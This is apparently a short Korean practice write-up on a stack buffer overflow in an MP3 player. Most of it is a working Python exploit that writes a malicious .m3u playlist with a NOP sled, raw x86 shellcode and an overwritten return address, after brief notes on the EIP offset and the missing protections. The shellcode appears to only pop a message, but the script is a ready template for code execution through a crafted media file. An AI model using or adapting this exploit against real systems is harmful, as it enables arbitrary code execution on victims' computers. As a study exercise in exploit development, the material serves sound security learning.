My MP3 Player - Stack Overflow

보호기법 증말없다. 엄청쉽다. 이거하고 보호기법 걸린거 해야지

EIP는 1032바이트에서부터 바뀌더라구요

다른모듈에도 ASLR은 안걸려있지만 jmp esp 가젯은 존재하지않았습니다. 그래서 그냥 버퍼에 놉 슬레딩해주고 쉘코드넣어서 익스플로잇을했어요

import struct
import os,sys,time
from subprocess import *
p = lambda x:struct.pack("<L",x)
up = lambda x:struct.unpack("<L",x)




shellcode = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x69\x21\x21\x01\x68\x67\x73\x61\x72\x68\x20\x73\x30\x6e\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"

payload = "\x90"*100
payload += shellcode
payload += "\x90"*(1024-len(payload))
payload += p(0x18e404)



f = open("test.m3u","w")
f.write(payload)
f.close()
# print payload
# proc.stdin.write(payload)